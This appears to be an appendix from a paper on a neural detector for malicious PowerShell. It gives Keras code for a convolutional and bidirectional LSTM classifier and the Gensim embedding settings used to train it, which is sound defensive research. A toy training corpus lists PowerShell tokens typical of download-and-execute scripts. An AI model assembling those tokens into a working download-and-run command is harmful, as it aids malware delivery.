We used an LSTM layer on top of a concatenation of the outputs of two convolutional layers – one on top of the token-level input and the other on top of the character-level input. Note that in the character-level case, we use a global max-pooling layer on top of the convolutional layer, resulting in a single tensor of length 64. In order to concatenate it with the output of the max pooling performed on the token-level convolutional layer, we first duplicate this tensor so that it has the same length as the latter. In both cases, the convolutional layer has 64 filters and a kernel size of 3 (i.e., 3 tokens/characters are processed at a time). For the token-level input, a max-pooling layer with a pool and stride size of 3 is used. After the concatenation, we use a bi-directional LSTM layer with an output of size 32, and a dense layer with a sigmoid activation function as our output.
from keras.models import Model
from keras.layers import (Input, Conv1D, MaxPooling1D, GlobalMaxPooling1D,
                          Dropout, RepeatVector, Bidirectional, LSTM, Dense,
                          concatenate)

# TOKEN branch
token_input = Input(shape=(1000,), dtype='float')
# GetEmbeddingLayer() returns our pre-trained token embedding layer (see Section IX-D)
token_embedding = GetEmbeddingLayer()(token_input)
token_conv = Conv1D(64, kernel_size=3, strides=1, padding='valid',
                    activation='relu')(token_embedding)
token_pool = MaxPooling1D(pool_size=3, strides=3)(token_conv)
token_drop = Dropout(0.5)(token_pool)

# CHAR branch
char_input = Input(shape=(1000,), dtype='float')
# OneHotWithCaseBit() produces the case-preserving one-hot character encoding;
# max_len is the maximum input length
char_encoding = OneHotWithCaseBit(max_len)(char_input)
char_conv = Conv1D(64, kernel_size=3, strides=1, padding='valid',
                   activation='relu')(char_encoding)
char_pool = GlobalMaxPooling1D()(char_conv)
char_drop = Dropout(0.5)(char_pool)
# duplicate the character-level tensor so it matches the token-level sequence length
char_repeated = RepeatVector(token_drop.get_shape()[1].value)(char_drop)

# Merge the two branches
merged = concatenate([token_drop, char_repeated])
lstm = Bidirectional(LSTM(32, dropout=0.3, recurrent_dropout=0.01))(merged)
output = Dense(1, activation='sigmoid')(lstm)
# build the final two-input model
model = Model(inputs=[token_input, char_input], outputs=output)

IX-D Tokens Embedding

We used Gensim (https://radimrehurek.com/gensim/) to build the embedding. Both W2V and FastText were used, with CBOW as the training algorithm. The parameters used are listed below (a training sketch follows the list):

  • Min length of a word was two, max was 50.

  • We ignored all words with total frequency lower than ten.

  • Our embedding space size is 32.

  • The window size used was 4 (window is the maximum distance between the current and predicted word within a sentence).

  • We performed negative sampling with five noise words.

  • We performed 25 iterations.
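Putting the above parameters together, a minimal training sketch (using gensim 3.x-style argument names; the tiny toy corpus below stands in for our tokenized scripts) could look as follows. The word-length limits (2 to 50 characters) are assumed to be enforced by our tokenizer rather than by gensim.

from gensim.models import Word2Vec, FastText

# toy stand-in for the tokenized PowerShell corpus
tokenized_scripts = [['invoke-webrequest', '-uri', 'gettemppath', 'start-process']] * 50

common_params = dict(
    size=32,        # embedding space size
    window=4,       # maximum distance between current and predicted word
    min_count=10,   # ignore words with total frequency lower than ten
    sg=0,           # CBOW training algorithm
    negative=5,     # negative sampling with five noise words
    iter=25,        # 25 training iterations
)

w2v = Word2Vec(sentences=tokenized_scripts, **common_params)
ft = FastText(sentences=tokenized_scripts, **common_params)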